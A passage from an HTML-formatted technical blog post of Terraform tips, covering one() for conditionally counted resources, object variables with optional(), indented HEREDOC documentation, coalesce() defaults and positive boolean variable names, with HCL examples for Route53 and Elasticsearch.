  &lt;span class="nx"&gt;count&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;create_dns&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"rosesecurity.dev"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_record"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;zone_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;aws_route53_zone&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;zone_id&lt;/span&gt;  &lt;span class="c1"&gt;# ❌ Dangerous&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"blog.rosesecurity.dev"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"A"&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This looks fine and might even work in &lt;code&gt;dev&lt;/code&gt; environments where &lt;code&gt;var.create_dns = true&lt;/code&gt;. But the moment that variable is &lt;code&gt;false&lt;/code&gt; in another environment, you get:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Error: Invalid index

The given key does not identify an element in this collection value:
the collection value is an empty tuple.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The issue? &lt;strong&gt;This fails at runtime, not plan time.&lt;/strong&gt; The code works when the resource exists and breaks when it doesn't.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution
&lt;/h3&gt;

&lt;p&gt;Use &lt;code&gt;one()&lt;/code&gt; with the &lt;code&gt;[*]&lt;/code&gt; splat operator:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_zone"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;create_dns&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"rosesecurity.dev"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_record"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;zone_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;one&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;aws_route53_zone&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;[*].&lt;/span&gt;&lt;span class="nx"&gt;zone_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# ✅ Safe(r)&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"blog.rosesecurity.dev"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"A"&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;one()&lt;/code&gt; function (available in Terraform v0.15+) is designed for this exact pattern:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;If count = 0&lt;/strong&gt;: Returns &lt;code&gt;null&lt;/code&gt; gracefully instead of crashing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;If count = 1&lt;/strong&gt;: Returns the element's value&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;If count ≥ 2&lt;/strong&gt;: Returns an error (catches your mistake early)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;When you use &lt;code&gt;[0]&lt;/code&gt;, you're assuming the resource exists. When you use &lt;code&gt;one()&lt;/code&gt;, you're validating it exists.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Bonus: &lt;code&gt;one()&lt;/code&gt; also works with sets, which don't support index notation at all. Using &lt;code&gt;one()&lt;/code&gt; makes the code more versatile and future-proof.&lt;/p&gt;




&lt;h2&gt;
  
  
  Design Better Module Variables with Objects, &lt;code&gt;optional()&lt;/code&gt;, and &lt;code&gt;coalesce()&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;When building reusable Terraform modules, variable design makes the difference between a module that's fun to use and one that's a configuration nightmare. Here's a pattern that combines several Terraform features to create flexible, well-documented, and maintainable module interfaces.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Problem: Scattered Variables
&lt;/h3&gt;

&lt;p&gt;Most modules start simple and grow organically, leading to an explosion of individual variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ❌ Scattered variables - hard to manage and document&lt;/span&gt;
&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch_subdomain_name"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"The name of the subdomain for Elasticsearch"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch_port"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;number&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Port for Elasticsearch"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;9200&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch_enable_ssl"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Enable SSL for Elasticsearch"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"kibana_subdomain_name"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"The name of the subdomain for Kibana"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"kibana_port"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;number&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Port for Kibana"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;5601&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"kibana_enable_ssl"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Enable SSL for Kibana"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# ... and on and on for 12+ more variables&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This gets unwieldy fast. Users have to understand which variables are related, documentation becomes repetitive, and adding a new service means adding another set of scattered variables.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Group Related Variables into Objects
&lt;/h3&gt;

&lt;p&gt;Use objects with the &lt;code&gt;optional()&lt;/code&gt; function to group logically related settings:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ✅ Grouped by logical component&lt;/span&gt;
&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch_settings"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;object&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;port&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;number&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;9200&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;enable_ssl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="p"&gt;})&lt;/span&gt;

  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;-&lt;/span&gt;&lt;span class="no"&gt;DOC&lt;/span&gt;&lt;span class="sh"&gt;
    Configuration settings for Elasticsearch service.

    subdomain_name: The name of the subdomain for Elasticsearch in the DNS zone (e.g., 'elasticsearch', 'search'). Defaults to environment name.
    port: Port number for Elasticsearch. Defaults to 9200.
    enable_ssl: Enable SSL/TLS for Elasticsearch. Defaults to true.
&lt;/span&gt;&lt;span class="no"&gt;  DOC
&lt;/span&gt;  &lt;span class="nx"&gt;default&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"kibana_settings"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;object&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;port&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;number&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;5601&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;enable_ssl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="p"&gt;})&lt;/span&gt;

  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;-&lt;/span&gt;&lt;span class="no"&gt;DOC&lt;/span&gt;&lt;span class="sh"&gt;
    Configuration settings for Kibana service.

    subdomain_name: The name of the subdomain for Kibana in the DNS zone (e.g., 'kibana', 'ui'). Defaults to environment name.
    port: Port number for Kibana. Defaults to 5601.
    enable_ssl: Enable SSL/TLS for Kibana. Defaults to true.
&lt;/span&gt;&lt;span class="no"&gt;  DOC
&lt;/span&gt;  &lt;span class="nx"&gt;default&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;optional()&lt;/code&gt; function (Terraform v1.3+) lets you define object attributes that users can omit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="err"&gt;)&lt;/span&gt;        &lt;span class="c1"&gt;# Can be omitted, defaults to null&lt;/span&gt;
&lt;span class="nx"&gt;port&lt;/span&gt;           &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;number&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;9200&lt;/span&gt;&lt;span class="err"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# Can be omitted, defaults to 9200&lt;/span&gt;
&lt;span class="nx"&gt;enable_ssl&lt;/span&gt;     &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bool&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="err"&gt;)&lt;/span&gt;    &lt;span class="c1"&gt;# Can be omitted, defaults to true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means users can provide as much or as little configuration as they need:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Minimal - just override subdomain&lt;/span&gt;
&lt;span class="nx"&gt;elasticsearch&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"search"&lt;/span&gt;
  &lt;span class="c1"&gt;# port and enable_ssl use defaults&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Or provide nothing, use all defaults&lt;/span&gt;
&lt;span class="nx"&gt;elasticsearch&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;

&lt;span class="c1"&gt;# Or customize everything&lt;/span&gt;
&lt;span class="nx"&gt;elasticsearch&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"es-prod"&lt;/span&gt;
  &lt;span class="nx"&gt;port&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;9300&lt;/span&gt;
  &lt;span class="nx"&gt;enable_ssl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  HEREDOC Syntax for Documentation
&lt;/h3&gt;

&lt;p&gt;Use &lt;strong&gt;indented HEREDOC&lt;/strong&gt; (&lt;code&gt;&amp;lt;&amp;lt;-DOC&lt;/code&gt;) to document complex object variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;-&lt;/span&gt;&lt;span class="no"&gt;DOC&lt;/span&gt;&lt;span class="sh"&gt;
  Configuration settings for Elasticsearch service.

  subdomain_name: The name of the subdomain for Elasticsearch in DNS.
  port: Port number for Elasticsearch. Defaults to 9200.
  enable_ssl: Enable SSL/TLS. Defaults to true.
&lt;/span&gt;&lt;span class="no"&gt;DOC
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why the dash matters:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;&amp;lt;&amp;lt;-DOC&lt;/code&gt; (with dash): Automatically strips leading whitespace, allowing proper indentation&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;&amp;lt;&amp;lt;DOC&lt;/code&gt; (without dash): Preserves all whitespace, breaking terraform-docs parsing and formatting&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The indented version plays nicely with automatic documentation generators like terraform-docs, producing clean, readable output in your README.&lt;/p&gt;

&lt;h3&gt;
  
  
  Smart Defaults with &lt;code&gt;coalesce()&lt;/code&gt; and Context
&lt;/h3&gt;

&lt;p&gt;Combine objects with the &lt;a href="https://github.com/cloudposse/terraform-null-label" rel="noopener noreferrer"&gt;Terraform null label pattern&lt;/a&gt; (context.tf) to provide intelligent defaults:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Use locals to apply coalesce logic&lt;/span&gt;
&lt;span class="nx"&gt;locals&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;elasticsearch_subdomain&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;coalesce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;elasticsearch&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;subdomain_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;module&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="nx"&gt;kibana_subdomain&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;coalesce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;kibana&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;subdomain_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;module&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Resources reference the locals&lt;/span&gt;
&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_record"&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;zone_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;zone_id&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"${local.elasticsearch_subdomain}.rosesecurity.dev"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"CNAME"&lt;/span&gt;
  &lt;span class="nx"&gt;records&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;aws_elasticsearch_domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;endpoint&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="nx"&gt;ttl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;300&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_record"&lt;/span&gt; &lt;span class="s2"&gt;"kibana"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;zone_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;zone_id&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"${local.kibana_subdomain}.rosesecurity.dev"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"CNAME"&lt;/span&gt;
  &lt;span class="nx"&gt;records&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;aws_elasticsearch_domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;kibana_endpoint&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="nx"&gt;ttl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;300&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;coalesce()&lt;/code&gt; function returns the first non-null value, giving you:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Without user input&lt;/strong&gt; (in "prod" environment):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;elasticsearch.prod.rosesecurity.dev&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;kibana.prod.rosesecurity.dev&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;With user override:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;elasticsearch&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"search"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Results in: &lt;code&gt;search.prod.rosesecurity.dev&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Let users configure only what matters, default the rest.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Group related variables into objects, use &lt;code&gt;optional()&lt;/code&gt; for flexibility, document with indented HEREDOCs, and combine with &lt;code&gt;coalesce()&lt;/code&gt; for intelligent defaults. Your module users will thank you.&lt;/p&gt;




&lt;h2&gt;
  
  
  Avoid Double Negatives in Variable Names
&lt;/h2&gt;

&lt;p&gt;Boolean variables with negative names add unnecessary mental overhead. Positive variable names make conditional logic clearer and reduce the chance of configuration mistakes.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Problem
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ❌ Negative variable name&lt;/span&gt;
&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"disable_encryption"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Disable encryption"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
